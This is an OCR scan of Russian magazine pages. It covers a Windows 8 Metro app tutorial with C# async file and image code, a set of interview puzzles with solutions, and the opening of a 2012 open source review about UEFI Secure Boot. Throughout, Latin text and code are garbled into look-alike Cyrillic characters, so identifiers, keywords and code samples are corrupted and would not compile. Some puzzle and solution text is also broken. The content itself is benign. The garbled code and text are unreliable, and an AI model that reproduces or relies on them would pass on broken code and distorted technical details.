Меіго-интерфейса, занимают два компонента: бгіЬѴіеѵѵ и ІізіѴіеѵѵ. 
Первый представляет собой прокручиваемую горизонтально плитку, 
которая ровной мозаикой заполнена элементами (файлами, ярлы- 
ками, изображениями и прочим), вторая выглядит как вертикально 
прокручиваемый список. Оба объекта предназначены для опреде- 
ленных целей: когда приложение развернуто на фуллскрин, имеет 
смысл показывать объекты в бгісІѴіеѵѵ. Однако в \^іпс1о\л/5 8, кроме 
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поддержки ландшафтного и портретного режимов экрана, внутри 
этих режимов может быть закреплено дополнительное приложение. 

В таком случае для дополнительного приложения слева или справа 
выделяется область шириной 320 пикселей, при этом основное зани- 
мает всю оставшуюся часть. На подавляющем большинстве дисплеев 
320 пикселей не играют существенной роли (а там, где играют, режим 
закрепления не поддерживается), поэтому вид основного приложе- 
ния не портится. В то же время закрепленное приложение сужается 
весьма существенно, поэтому для отображения содержимого закре- 
пленной страницы разумно использовать компонент ІізіѴіеѵѵ. 

Вдобавок внешний вид приложений можно моделировать в ВІепсі 
^ог ѴізиаІ Біисііо 2012. В новой версии студии работа с блендом стала 
удобнее; теперь можно открыть бленд прямо из студии, для это- 
го надо щелкнуть в «Обозревателе решений» правой клавишей 
по ХАМІ-файлу, содержащему модифицируемую страницу, и выбрать 
из контекстного меню пункт «Открыть в ВІеп(і». 

[файловая СИСТЕМАІ 

В \^іпс1оѵѵ5 8, как ни странно, используется МТР5. В то же время по- 
добие смартфоновской системы не ограничивается только пользова- 
тельским интерфейсом; приложения ѴѴіпсІоѵѵз $1оге имеют такой же 
ограниченный доступ к файловой системе, как приложения ѴѴіпсІоѵѵз 
РЬопе, то есть выполняются в песочнице. Таким образом, каждое 
приложение имеет свое изолированное хранилище. Расширение 
по сравнению со смартфоновской ОС — это отдельное хранилище 
для каждого зарегистрированного в системе юзера, имеющего доступ 
к приложению. Каждое изолированное хранилище содержит три 
папки; 

• ІосаІРоШег — предназначена для хранения служебных файлов; 

• РоатіпдРоШег — хранит файлы, синхронизируемые на всех де- 
вайсах, на которых пользователь использует данное приложение; 

• ТетрогагуРоШег — в ней сохраняются временные файлы опреде- 
ленного приложения, но не стоит здесь сохранять что-то ценное, 
поскольку операционная система время от времени эту папку 
чистит. 

Каждая из перечисленных папок может содержать подкаталоги. 
Для сохранения настроек приложение предоставляет хранили- 
ща ІосаІБеиіпдз и РоатіпдБеиіпдз; в первом хранятся локальные 
данные, а второе используется для синхронизации настроек между 
различными девайсами. Для примера сохраним данные для подклю- 
чения к веб-ресурсу нашего гипотетического приложения. Добавь 
на форму два элемента типа ТехШох, соответственно для ввода логи- 
на и пароля, а также две кнопки (Вииоп); Баѵе и Іоасі. В обработчике 
первой для сохранения значения напиши (код сокращен); 

МіпсІоѵѵз.БІіогабе.АррІіса-СіопОаІа.СиггепІ:. ІосаІБеІ'Сіпдз.»-' 
Ѵа1ие5["І08іп"] = ІодіпВох.ТехІ; 

Чтобы загрузить значение в обработчике нажатия второй кнопки, 
осуществим обратный процесс, проверив сперва присутствие значе- 
ния; 

ѵаг зТоге = 1лІіпс1ом5.5-Сога8е.Арр1іса1:іоп0а‘Са.СиггепТ.4-. 
ІосаІБе-^-Іііпбз; 

і-Р (зІоге.ѴаІиез.Соп-СаіпзКеуС'Іо^іп")) { 

ІоеіпВох.ТехІ; = (з1гіп8)ЫіпсІ0М5 .5'Сога§е.«-' 
Арр1іса-Сіоп0аТ:а.Сиггеп-С.Іоса15е«іп85.\/а1ие5["ІО8іп"]; 

} 

Сохранение данных в отдельное хранилище определенной про- 
граммы напомнило мне былые времена, когда в ѴѴіпсІоѵѵз отсутство- 
вал реестр и каждое отдельно взятое приложение хранило свои 
данные в іпі-файле. 

Чтобы получить из приложения доступ к таким сиаемным папкам, 
как «Документы», «Изображения», «Видео» и другие, нужно объявить 
об этом в манифесте приложения, открыв файл Раскаде.аррхтапііезі. 



В манифесте приложения настраивается широкий диапазон параме- 
тров, сгруппированных и разделенных по вкладкам; «Интерфейс при- 
ложения» — здесь настраиваются поддерживаемые ориентации экрана, 
язык, имя, точка входа, начальная заставка и эмблема; на вкладке «Воз- 
можности» как раз присутствуют переключатели для включения доступа 
к нужным системным папкам, устройствам (камере, микрофону, внеш- 
ним накопителям). На вкладке «Объявления» регистрируются события, 
на которые может отвечать приложение, кроме того, здесь указываются 
разрешения на выполнение действий. Список «Доступных объявлений» 
довольно-таки исчерпывающий. \А на закладке «Упаковка» указывается 
имя пакета, версия, семейство и издатель. 

[ДОСТУП к ФАЙЛАМІ 

Вместе с приходом новой версии студии язык С# был обновлен 
до версии 5. Самое значительное нововведение языка — это новая 
поддержка асинхронных операций. В ѴѴіпсІоѵѵз 8 повсюду при- 
меняются асинхронные вызовы. Когда мы с тобой программиро- 
вали для \^іпРбопе, то выполнение логики выносили в отдельный 
от ГУѴ[ поток, чтобы ГУИ отвечал на запросы пользователя во время 
проведения операции. То же самое должно быть в приложениях 
для «восьмерки», однако в новой версии языка его проектировщики 
пошли нам навстречу и избавили от необходимости организовывать 
выполнение в отдельном потоке. При этом в яэык были добавлены 
новые механизмы, использование которых гораздо рациональнее, 
чем старая организация асинхронности. Рассмотрим эту возможность 
подробнее, а заодно посмотрим на файловый ввод/вывод, реализо- 
ванный в новой операционке. Хотя \А/іпсІоѵѵз 8 запрещает напрямую 
обращаться к файлам, находящимся за пределами изолированного 
хранилища приложения, у разработчика все же есть средства для от- 
крытия/сохранения файлов под надзором операционной системы. Эти 
средства похожи на диалоги открытия/сохранения файлов в ^іп32. 
Разработаем в модели программирования ѴѴіпРТ простую Меіго- 
программу, которая сможет открывать графические файлы из любого 
каталога и сохранять в любое место, при этом используя новей- 
ший АРІ для работы с изображениями. Понимаю, такая программа 
не имеет никакой практической пользы, но она позволит нам увидеть 
использование асинхронных операций при работе с файлами. 

Итак, создай новый пустой проект. Пусть будет ІтадеБЬоѵѵ (см. 
исходник на диске). Первым делом изменим заставку приложения 
со стандартного пересеченного квадрата на что-нибудь более ориги- 
нальное; надпись «Хакер» на черном фоне. Подготовь растр в форма- 
те РМ6 размером 620 х 300 (или возьми с диска). Затем в Ѵ$ открой 
манифест разрабатываемого приложения, оставаясь на вкладке 
«Интерфейс приложения», в списке слева выбери пункт «Все активы 
изображений», затем прокрути список справа в самый низ, там ниже 
надписи «Заставка» введи путь к подготовленному изображению 
и для правой картинки (ниже надписи «Масштабированные активы») 
с помощью диалога выбери наше изображение. Остальные картинки 
в этом списке понадобятся для других целей; эмблема приложения 
в магазине, маленькая/широкая эмблема и так далее. 

Открой визуальный редактор страницы МаіпРаде. Размести 
на ней объект класса Ітаде и две кнопки (класса Вииоп). Одна послу- 
жит для загрузки изображения, вторая— для сохранения. Во-первых, 
подключи следующие пространства имен; 

и$іпе МіпсІоѵѵ5.5'Сога§е; 

и5іп§ Ыіпсіомз.Б-Согаее.Ріскегв; 

и$іп§ МІПСІОМ5 . III . Хаілі .Месііа . Ітазіп§; 



ПРИЛОЖЕНИЯ ^ІМОО№ 5Т0ЯЕ 
ИМЕЮТ ОГРАНИЧЕННЫЙ ДОСТУП 
К ФС, КАК И ПРИЛОЖЕНИЯ ДЛЯ Ш 
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Во-вторых, в начале класса МаіпРаде добавь объявление глобальной 
файловой переменной: БіогадеРіІе дІРіІе;. В-третьих, в обработчике 
кнопки для загрузки изображения напиши: 

РіІеОрепРіскег ЯІеРіскег = пей/ Рі1еОрепРіскег(); 
б1еРіскег.Рі1еТуреРі1-Сег.АсІсІ(" ор§"); 
б1еРіскег.5иббе5Т:есІ51:аг-СІосаТіоп = РіскегІоса-СіопІсІ.«-« 
РісСигезІіЬгагу; 

бІеРіскег.ѴіемМосІе = РіскегѴіемМосІе.ТЬитЬпаіІ; 
бІеРіскег.СоттіІВи'С'СопТехІ = "Открыть”; 

§1Рі1е = амаі'С бІеРіскег. Ріск5іп§1еРі1еА5упс(); 

ІР (ЕІРіІе != пиіі) { 

Ві1:тарІта§е 5гс = пем ВіТтарІтаееО; 

5ГС . 5е-С5оигсе(амаі1: ДІРіІе . ОрепАзупс*-* 
(РіІеАссеззМосІе.КеасІ)); 

Ітаее.Боигсе = 5гс; 

} 

Поскольку в зтом обработчике присутствует служебное слово, 
позволяющее выполнять асинхронный вызов, — аѵѵаіі, в заголовке 
функции после модификатора доступа необходимо указать вспомога- 
тельное ключевое слово азупс, которое служит только для того, чтобы 
показать компилятору, что в описываемой функции используется 
асинхронный вызов. В первой строчке тела создается объект — но- 
вый тип диалога открытия файла. Во второй этому диалогу добав- 
ляется тип открываемых им файлов. В третьей задается начальная 
директория. В четвертой задается тип отображения содержимого 
просматриваемых каталогов. В пятой — надпись на кнопке. В шестой 
с помощью асинхронного вызова метода выбора файла объекта- 
диалога в ранее объявленную файловую переменную сохраняется 
выбранный пользователем файл. Затем после проверки валидности 
файла создается объект — выделяется область памяти для хранения 
битмапа. В следующей строчке кода файл асинхронным образом 
открывается только для чтения, и прочитанные данные загружаются 
в выделенную на прошлом шаге область памяти. В предпоследней 
строке загруженные данные копируются в объект класса Ітаде 
для показа на странице приложения. 

Наша прога открывает ЗРб-файлы, значит, сохранять резуль- 
тирующее изображение она должна в этом же формате. Для этого 
воспользуемся объектом ВіІтарЕпсосІег, который содержит ЗР6- 
кодировщик. Для сохранения открытой картинки посредством диа- 
лога напиши: 

і-Р (§1Рі1е == пиіі) геТигп; 

РіІеБаѵеРіскег бІеРіскег = пем Рі1е5аѵеРіскег(); 
бІеРіскег . РіІеТуреСИоісез . АсІсІ*^ 

("♦.ЗР§", пем ІІ5Т: < 5Ігіп§ > () { 

"ОР8" 

}); 

Б'СогабеРіІе Яіе = амаі"С бІеРіскег. РіскБаѵеРіІеАзупсС ); 
биісі епсосіегісі = ВіТтарЕпсосІег. Зре§ЕпсосІегІсІ; 
і-Р (біе == пиіі) геТ:игп; 

и5іп§(ІКапсІотАссе555Т:геат іприІБ-Сгеат = амаіТ ДІРіІе. 4-^ 
ОрепАзупс ( РіІеАссеззМосІе . Кеасі ) , 
оиІіриІіБ-Сгеат = амаіі: б1е.0репАзупс(Рі1еАссеззМосІе.«-і 
КеасІМгі-Се)) { 

Ві1:тарОесосІег сіесосіег = амаіі: Ві'СтарОесосІег.»-' 
СгеаІеАзупс ( іпри-С5Т:геат) ; 

ВіТтарТгапз-Рогш -Сганз-Рогт = пем ВіТтарТгапз-Рогт(); 
ВіТтарРіхеІРогтаІ: -РогтаТ: = сіесосіег. Ві1:тарРіхе1РогтаТ; 
Ві-СтарАІрИаМосІе аІрЬа = сіесосіег. ВіІтарАІрЬаМосІе; 
РіхеІОа-СаРгоѵісІег ріхеІРгоѵісІег = амаіі сіесосіег.*-* 
СеТРіхеЮаТаАзупс ( 

■Рогтаі:, аІрЬа^ -Сгапз-Рогт, Ехі-РОгіепТа-СіопМосІе.— 
Кезрес-СЕхі-РОгіеп'Са'Сіоп, 

СоІогМапаеетепТМосІе . Со1огМапа§еТо5К§Ь) ; 

Ьу1:е[] ріхеіз = ріхеІРгоѵісІег. 0е-СасЬРіхе10а1:а(); 



ВіТтарЕпсосІег епсосіег = амаіі: Ві-СтарЕпсосІег.«-< 
Сгеа-СеАзупс(епсос1егІсІ, ои-Сри-СБ-Сгеат); 
епсосіег. Бе-СРіхе10а-Са(-Рогта^, аІрИа, сіесосіег, *-> 
Огіеп-СесІРіхеІМісІІІі, сіесосіег. Огіеп1:есІРіхе1Неі§Ы:, 
сіесосіег. ОріХ, сіесосіег. ОріѴ, ріхеіз); 
амаі-С епсосіег. РІизЬАзупсО; 

} 

Сперва, если никакой файл не загружен, — выходим. Затем созда- 
дим объект-диалог. Присвоим ему файловый тип, в который он может 
сохранять. Создадим новый файл, он вернется через асинхронный 
вызов диалога. Далее получим глобальный уникальный идентификатор 
кодировщика. В условии проверим: выбран ли файл для сохранения 
итоговой картинки, если нет (юзер нажал «Отмена» в диалоге) — выхо- 
дим. С помощью безопасной конструкции изіпд создадим два имеющих 
произвольный доступ потока в памяти: первый представляет собой 
загруженное изображение, второй — сохраняемое. Далее асинхронно 
создадим декодер на основе потока исходного изображения и полу- 
чим его дефолтные преобразования. Затем парой строк кода получаем 
формат пикселей декодера и его альфа-канал. С помощью метода 
6е(РіхеІ0а(аАзупс декодера мы через асинхронный метод получаем 
данные о пикселях изображения. Для этого передаем ему три ранее 
инициализированные переменные плюс указываем, если есть инфор- 
мация о преобразовании в ЕХІР метаданных изображения, применить 
их к сохраняемой картинке. Последним параметром сообщаем методу, 
чтобы управление цветом происходило на основе исходного изобра- 
жения с использованием схемы Р6В. После получения информации 

0 пикселях на ее основе формируем байтовый массив. Следующим 
действием создаем новый кодер, для этого конструктору, который, 
кстати, тоже асинхронный, передаем полученный ранее идентификатор 
используемого кодировщика и созданный в начале конструкции поток 
сохраняемого изображения. Предпоследним действием с помощью 
метода БеіРіхеЮаІа объекта-кодера применяем преобразования 

к пикселям. Этому методу передаются семь параметров: первые два — 
ранее найденные формат пикселя и альфа-режим; третьим и четвертым 
параметрами задаются ширина и высота изображения в пикселях, 
для этих значений возьмем аналогичные параметры исходной картин- 
ки; пятым и шестым параметрами указывается разрешение итогового 
изображения по горизонтали и вертикали соответственно; последним 
параметром передается массив байт, содержащий данные о пикселях 
исходного изображения. Последним действием опять-таки асинхрон- 
но сбрасываем все данные результирующей картинки. После выхода 
за командные скобки конструкции изіпд потоки в памяти будут закрыты 
и данные второго потока сброшены в файл на диск; если бы не ис- 
пользовалась конструкция изіпд, то данные изображения не со стопро- 
центной вероятностью были бы записаны в файл сразу после вызова 
РІизЬАзупс. Асинхронные операции требуют дополнительного контроля! 

1 итоги I 

Разговор о разработке для ѴѴіпсІоѵѵз 8 не закончен и закончен быть 
не может! В этой статье мы лишь прикоснулись к средствам разработ- 
ки для этой операционной системы. Мы слегка пробежались по вер- 
хушкам инноваций, которых в данной версии с избытком: взглянули 
на создание приложений для нового Меіго-интерфейса в модели 
программирования ѴѴіпсІоѵѵз Рипііте, посмотрели на обновленный 
С#, на его мощные средства асинхронного выполнения операций. 
Испытали новую ѴізиаІ Зіисііо. Вдобавок, работая с изображениями, 
мы использовали новые средства АРІ-интерфейса. 

Уже имеются сведения об успехе ѴѴіпсІоѵѵз 8, следовательно, 
в будущем эта система еще больше завоюет рынок.. Меіго-интерфейс 
позволяет гладко работать на все большем количестве разнообразных 
устройств. Портирование на АРМ-архитектуру расширило число потен- 
циальных пользователей ПО, использующих не РС, а другие информа- 
ционные устройства. На интеловских архитектурах (х86/х64) \Л^іпсіоѵѵз 8, 
как ни странно, работает быстро даже на морально и физически устарев- 
ших машинах! А по аабильности и защищенности, как и должно быть, 
она превосходит всех своих прародителей и многих конкурентов, з: 
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Александр Лозовский (АІехапсІегбгеаІ.хакер.гиІ 



ПОДБОРКА 

ИНТЕРЕСНЫХ 

ЗАДАНИЙ, 

КОТОРЫЕ ДАЮТ 
НА СОБЕСЕДОВАНИЯХ 

Задачи 




на собеседованиях 



Задача от 6гоир-1В 

[УСЛОВИЯ I 

1) Сколько разделов имеется на носителе информации согласно 
представленному изображению? 

2) Сколько загрузочных (активных) разделов имеется на носителе 
информации согласно представленному изображению? 

3) В какую файловую систему размечены разделы на носителе 
информации согласно представленному изображению? 

[РЕШЕНИЯ 

1) Два раздела, согласно значениям байт по смещению +1ВЕИ 
и +1СЕІ1. 

2) Один раздел, согласно значению первого байта в записи раз- 
делов «80Ь». 

3) Один раздел отформатирован в файловую систему МТР5, 
согласно значению четвертого байта в записи раздела № 1, 
«07Н», второй раздел является расширенным (ЕХТ) — согласно 
значению четвертого байта в записи раздела № 2 — «05И», 

и установить его файловую систему по имеющемуся изображе- 
нию не представляется возможным. 
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Задача от Асгопіз № 1 

ІУСЛОВИЯІ 

Напишите метод, который будет подсчитывать количество цифр 2, 
используемых в записи чисел от О до п включительно. 

|РЕШЕНИЕ«ВЛОБ»| 

//* Подсчитываем число ’2‘ между 0 ♦/ 

ІПІ: питЬегО-Р25ІпКап8е(іпТ п) { 
іп-1: соип-С = Ѳ; 

■Рог (іпТ і = 2; і <= п; і++) { // Можем начать с 2 
соиітС += питЬегО-Р2$(і); 

} 

геТигп соип'С; 

} 

/* подсчитываем число ’2’ в одном числе ♦/ 
іпТ питЬегО-Р25(іп-1: п) { 

ІПІ: соипі: = 0; 
мИіІе (п > 0) { 
і-Р (п % 10 == 2) { 
соигѵС++; 

} 

п = п / 10; 

} 

геігигп соипі; 

} 

Комментарий: единственное интересное место в этом алго- 
ритме — выделение питЬегОР25 в отдельный метод. Это делается 
для чистоты кода. 

ІУЛУЧШЕННОЕРЕШЕНИЕІ 

Можно смотреть на задачу не с точки зрения диапазонов чисел, 
а с точки зрения разрядов — цифра за цифрой. 
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Мы знаем, что в последовательном ряду из десяти чисел по- 
следний разряд принимает значение 2 только один раз. И вообще, 
любой разряд может быть равен 2 один раз из десяти. 

Хотя тут стоит использовать слово «приблизительно», потому 
что необходимо учитывать граничные условия. Просчет количества 
двоек для диапазонов 1-100 и 1-37 будет различаться. Точно ко- 
личество двоек можно вычислить, рассмотрев все по отдельности 
разряды: сіідіі < 2, сііді( > 2 и (іідіі = 2. 

(1іди<2 

Если X = 61523 и (і = 3, то х[с1] = 1 (это означает, что с1-й разряд х 
равен 1). Рассмотрим двойки, находящиеся в 3-м разряде, в диа- 
пазонах 2000-2999, 12 000-12 999, 22 000-22 999, 32 000-32 999, 

42 000-42 999, 52 000-52 999. Мы не будем учитывать диапазон 
62 000-62 999. В перечисленные диапазоны попадает 6000 двоек, 
находящихся в 3-м разряде. Такое же количество двоек можно 
получить, если подсчитать все двойки в 3-м разряде в диапазоне 
чисел от 1 до 6000. 

Другими словами, чтобы рассчитать количество двоек в сі-м 
разряде, достаточно округлить значение до Юсі + 1, а затем раз- 
делить на 10. 

і-Р х[(1] < 2: соип125ІпКап8еА10і§і1(х, сі) = 

1е1 у = роипсі сіомп до ближайшего 10СІЧ-1 
геіигп у / 10 



сІіди>2 

Давайте рассмотрим случай, когда значение сі-го разряда больше, 
чем 2 (х[сі] > 2). Если использовать ту же логику, становится по- 
нятно, что количество двоек в 3-м разряде диапазона 0-63 525 
будеттаким же, как в диапазоне 0-7000. Таким образом, вместо 
округления вниз мы будем округлять вверх. 

і-Р х[с1] > 2: соип125ІпКапбеА10і8і1(х, сІ) = 

1е1 у = гоипсі ир до ближайшего ІѲсІ+1 
геіигп у / 10 

(ІідН = 2 

Последний случай самый трудный, но мы можем использовать 
ту же логику. Пусть х = 62 523 и сі = 3. Мы знаем, что диапазоны не 

изменились (2000-2999, 12 000-12 999 52 000-52 999). Сколько 

двоек может появиться в 3-м разряде в диапазоне 62 000-62 523? 
Подсчитать несложно — 524 (62 000, 62 001, ..., 62 523). 

і-Р х[с1] > 2: соип125ІпКап§еА1:0і§і1:(х, сІ) = 

1е1 у = округляем вниз до ІѲсІ+1 
1е1 7 = правая сторона х (то есть х % 10с1) 
геіигп у / 10 + 2 + 1 

Теперь нам нужно пройтись по каждой цифре в числе. Реализа- 
ция данного кода относительно проста. 

риЫіс зіаііс іпІ соип125ІпКап8еА10і§і1(іп1 питЬег, «-< 
ІПІ сІ) { 

ІПІ ромегО-Р10 = (ІПІ;) Ма1Іі.ром(10, сІ); 

ІПІ пех1РомегО-Р10 = ромегО-Р10 * 10; 

ІПІ гі^Ьі = питЬег % ромегО-Р10; 

ІПІ; гоипсЮомп = питЬег - питЬег % пех1РомегО-Р10; 

ІПІ гоипсіир = гоипсІОомп + пех1РомегО-Рі0; 

ІПІ; СІІ8І1 = (питЬег / ромегО-Рі0) % 10; 
і-Р (сіі^іі < 2) { // если СІІ8І1 меньше 2 
геіигп гоипсЮомп / 10; 

} еізе і-Р (сіібіі == 2) { 

геіигп гоипсЮомп / 10 ч- гі^ЬІ + 1; 

> еізе { 

геіигп гоипсіир / 10; 

} 

} 

риЫіс Біаііс іпІ соип125ІпКап8е(іп1; питЬег) { 

ІПІ соипі = 0; 

ІПІ Іеп = 51гіп§.ѵа1иеО-Р(питЬег) .1еп8ІЬ(); 

■Рог (ІПІ СІІ8І1 = 0; СІІ8І1 < Іеп; сіі^іі-»-*-) { 
соипі -ь= соип125ІпКап8еА10і§і1(питЬег, сІі^іТ); 

} 

геіигп соипі; 

} 

Комментарий: данная задача требует тщательного тестирова- 
ния. Убедитесь, что вы знаете все граничные случаи и проверили 
каждый из них. 

Задача от Асгопіз № 2 

[УСЛОВИЕ I 

ѵоісі ргіп1(соп5І сЬаг* і) { 

5ІСІ: :сои1 << і; 

} 

ІПІ таіп(){ 

СОП5І сЬаг* 1с1т[] = {"О", "А", "С", "В", "Е"}; 

5ІсІ::5е1 -Реа1иге5(1с1т, Ісіт + 5); 

5ІСІ: :-Рог_еасЬ(-Реа1иге5.Ье8Іп(), 

■РеаІигез.епсІО, ргіпі); 
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геігигп 0; 

} 

Вопрос короткий: что будет выведено в консоль? 

[РЕШЕНИЕ I 

Мнение самой компании АсгопІ5 о решении этой задачки мы не уз- 
наем (их старый пиарщик уже уволился, а новый отвечать на почту 
и телефон пока не успевает). Поэтому отвечает Федор Двинятин — 
а точнее, наш Оееопіз. Он передает нам, что пример этот собирать- 
ся не будет, поскольку зісііізеі — шаблонный контейнер, а в коде не 
указывается тип элементов (что не мешает указать нам, например, 
5І(1::5е1<соп8І сЬаг*> (еа1иге$(1с1т, Ыт + 5);). В консоль выведутся 
строки из массива 1(1т. 

Задача от Т-Зузіета № 1 

[УСЛОВИЯ I 

Заданы две последовательности XI, Х2, Хп и VI, Ѵ2, ..., Ѵк про- 
извольных элементов (]аѵа.Іапд.ОЬ)есІ). Определить, можно ли 
получить последовательность X путем вычеркивания некоторых 
элементов из У? 

В качестве входных параметров в метод передаются два спи- 
ска: первый — список Хі, второй — список Уі. 

Название интерфейса сот.ІзузІетз.іаѵазсЬооІ.Іазкз.ЗиЬвериепсе 
Имя класса сот.ІвузІетз.ІаѵазсЬооиазкз.БиЬзеяиепсеІтрІ 

Имя архива зиЬзедиепзе.гір 

[решение! 

БиЬзедиепсе 5 = пещ 5иЬ5едиепсеІтр1() ; 

Ьооіеап Ь = 5.бпсІ(Аггау5.а5ІІ5-С("А", "В", *’С", "О"), ^ 
Аггау5.а$Іі$-Ь("В0"л "А", "АВС”, "В", "М", "О", "М", ^ 

"С", "ОС", "О")); 

5у5І:ет.ои1:.ргіп'Ып(Ь); // Результат: ^гие 



Задача от Т-Зузіетз № 2 

[условия! 

Составить программу для обработки файла по следующему ал- 
горитму. Задается входной файл, содержащий текстовые строки. 
Программа обрабатывает его и создает в указанном месте вы- 
ходной файл, содержащий отсортированные по алфавиту непо- 
вторяющиеся строки исходного файла. В конце каждой строки 
в квадратных скобках указывается количество повторений данной 
строки во входном файле. 

В качестве входных параметров в метод передаются два файла: 
первый — входной, второй — выходной. Метод возвращает Ігие 
тогда, когда обработка файла прошла успешно, иначе — (аізе. 

Не гарантируется, что данные файлы существуют. В случае если 
выходной файл не существует, он должен быть создан. Если он су- 
ществует, необходимо дописать результат выполнения программы, 
без перезаписи уже содержащейся там информации. 

Название интерфейса сот.ІзузІетз.іаѵазсЬооІ.Іазкз.ОиріісаІеРіпсІег 
Имя класса сот.ІзузІетз.іаѵазсНооІ.іазкз.ОирІісаІеРіпсІегІтрІ 

Имя архива сіиріісаіез.гір 

[решение! 

ОирІіса-^еРіпсІег сі = пем Оир1іса1:еРіпс1егІтр1(); 
сІ.ргосе55(пеіл/ Рі1е("а.-Сх1:"), пем Рі1е("Ь.1х1")); 
а.ііхі: 
ссс 
дбд 
ЬЬЬ 
666 
666 
ааа 
ЬЛхІ: 
ааа[1] 

ЬЬЬ[1] 

ссс[1] 

сісіа[з] 



Новая партия задач / Сверяй решение в следующем номере 



Задача от 6гоир-1В № 1 



Какая процедура реализована в данном 
коде? 

Іеа Ьх,агг 
яюѵ сх,Ы 
зиЬ сх,1 
ІаЬеІІ: 
ризЬ сх 
хог 5І,$І 
яюѵ сІі,2 
яюѵ сх,М-1 
1аЬе12: 

яюѵ ах,могсІ р^г [Ьх+ 5 і] 
яюѵ с1х,могсі р-Ьг [Ьх+с1і] 
сяір ах,сіх 
^1е ІаЬеІЗ 

яюѵ моггі р-СГ [Ьх+5І],СІХ 

яюѵ могсі р-Ьг [Ьх+сІі],ах 

ІаЬеІЗ: 

а66 5і,2 

аскі 6іі2 

Іоор 1аЬе12 

рор сх 

Іоор ІаЬеІІ 



Задача от 6гоир-ІВ № 2 



В ОС семейства ѴѴіпсІоѵѵз ХР существует команда, 
исполняемая через Рип(ЛІ32.ехе, с помощью которой 
можно создать каталоги даже там, где это под огра- 
ниченной учетной записью пользователя сделать 
нельзя. Например, в каталоге %и5егрго^іІе%\Іосаі 
ЗеиіпдзМетрогагу Іпіегпеі РіІе5\СопІепМЕ5. 

Что это за команда? (Полная строка команды для 
требуемого действия.) 



Задача от ИТ-компании СІІ5ТІ5 (сизііз.ги) Не 1 



Перед игроком на столе лежит 12 монет: 7 вверх орлом, 
5 — решкой. Игрок с завязанными глазами может рас- 
кладывать монеты на кучки и переворачивать монеты. 

Задача: выделить две кучки с гарантированно 
одинаковым (возможно, нулевым) количеством монет 
орлом вверх. Естественно, на ощупь положение 
монеты не определяется и кучки монет не могут быть 
пустыми. 



Задача отСи$ТІ5Мо2 



Что будет выведено на консоль в результа- 
те выполнения метода РипТезіО? 

ргіѵаТе сіеіееа^е ТУ Рипс<ТХ, <-і 
ТУ>(ТХ х); 
ргіѵаТе ѴОІСІ 

Ргіп1:Ке5иІТ<ТУ>(Рипс<іпТ, ТѴ> Т) { 
СопзоІе.МгіТеІіпе*-' 
("{0}Л1}Л2}", -Р(І), -Р(2), ^ 
^=(3)); 

} 

риЫіс ѵоісі КипТезТО { 

ѵаг Т = 0; . 

Рипс<іп'1:, іп1:> -Р = 

X => { 1: += х; геТигп Т; }; 
^ = 1; 

РгіпТКезиІТ(-Р); 

} 






ОБЗОР САМЫХ 
ВАЖНЫХ 
СОБЫТИЙ В МИРЕ 
ОРЕМ 500КСЕ 
ЗА 2012 ГОД 

Каждый ГОД мы предлагаем обзор 
самых важных и значимых событий 
мира Ореп Зоигсе за прошедшие 
двенадцать месяцев, в котором 
рассказываем о последних версиях 
ядра Ыпих, рабочих сред КОЕ 
и 6М0МЕ, а также новых проектах 
и достижениях. Год 2012-й 
стал особо примечательным. 

Чего только стоит скандал, 
разгоревшийся вокруг режима 
безопасной загрузки ОЕРІ. 



иміхоіо 



Евгений Зобнин ІехесЬИ.ги) 



Новый 

пройденный рубеж 



Новый пройденный рубеж 




УЕРІИОРЕМ 50УРСЕ 



УЕРІ и его режим безопасной загрузки обсуж- 
дались в прошедшем году так часто, что уши 
горели, наверное, у самого Билла Гейтса. Суть 
проблемы заключалась в следующем: пред- 
ложенный еще в 2000 году новый интерфейс 
между ОС и железом, который призван за- 
менить устаревший ВІ05, но очень неохотно 
внедряется производителями, наконец начал 
получать распространение, что само по себе 
никаких проблем не вызвало. Проблемой 
стала, как всегда, Місгозо^С готовившая к вы- 
пуску ѴѴіпсіоѵѵз 8, одним из требований которой 
при работе на ІІЕРІ-системах стала обязатель- 
ная поддержка «режима безопасной загруз- 
ки». Он, в свою очередь, требовал, чтобы за- 
грузчик, ядро и драйверы ОС были подписаны 
криптографическим ключом, закрытая часть 
которого хранится в ПЗУ материнки и других 
компонентов компа. В общем, МісгозоЙ по- 
казала фигу всем альтернативным ОС, сказав: 
«Мы большие, наши ключи все равно будет 
использовать любой производитель, а вы 
решайте свои проблемы сами». 

Собственно, история началась еще в конце 
2011 года с заметки Мэтью Гаррета из Ресі Наі, 
в которой он высказал свои опасения по по- 
воду того, что разработчики дистрибутивов 
Ііпих могут столкнуться с проблемами при по- 
пытках передать свои ключи производителям 
оборудования, а сами производители могут 
даже не реализовать возможность отключе- 
ния безопасной загрузки в своих продуктах. 
Буквально через несколько дней у Місгозо^І 
уже был готов ответ на эту заметку, суть ко- 
торого можно описать так: все ОК, все можно 
будет отключить. На это Гаррет сразу ответил, 
что МісгозоП, мягко говоря, лукавит: согласно 
ее же документации «режим безопасной за- 
грузки» должен быть включен по умолчанию, 
тогда как возможность его отключения не яв- 
ляется требованием, как и наличие сторонних 
ключей в ПЗУ. 

Вскоре СапопісаІ, Реб Наі и Еіпих Роипбабоп 
выпустили документ с большим количеством 
рекомендаций к производителям о реализа- 
ции возможности отключения злосчастного 
режима, возможности добавления сторонних 
ключей пользователем и т.д. и т.п. Понимая тем 
не менее, что невозможно достучаться до всех 
производителей, а также что велика опас- 
ность столкнуться с просто-таки глобальными 
проблемами, если призывать юзеров самим до- 
бавлять сторонние ключи во все оборудование 
ПК перед установкой сторонней ОС, разработ- 
чики пошли на кардинальный шаг — купить 
ключ у самой МІСГ050Й! 

О возможности осуществить такое в се- 
редине года заявил все тот же Мэтью Гаррет, 
сообщив, что отныне дистрибутив Ребога будет 
использовать минималистичный начальный за- 
грузчик, подписанный Місгозо^І, который доба- 
вит в список разрешенных собственные ключи 
Ребога, после чего управление будет передано 
загрузчику бгиЬ, подписанному ключом Ребога, 
далее подписанному им же ядру. Драйверы так- 
же будут подписаны ключом Ребога. По тому же 



Новый СЬготеЬоок от Ооодіе и Затзипд 

пути пошла СапопісаІ, заявив, однако, что ком- 
пы, изначально поставляемые с ІІЬипІи на борту 
или же официально совместимые с ней, уже 
будут включать в себя ключи СапопісаІ. 

Само собой, такие новости вызвали бурное 
обсуждение, к которому вскоре присоединил- 
ся Ричард Столлман со своим классическим 
лозунгом «Несвобода! Несвобода!», заявив, 
что единственная свобода только в том, чтобы 
позволить легко устанавливать в ПЗУ соб- 
ственные ключи всем желающим. К такому 
же выводу пришел Фонд СПО, выпустив набор 
рекомендаций для производителей комплек- 
тующих. Как всегда, особо отметился Тео де 
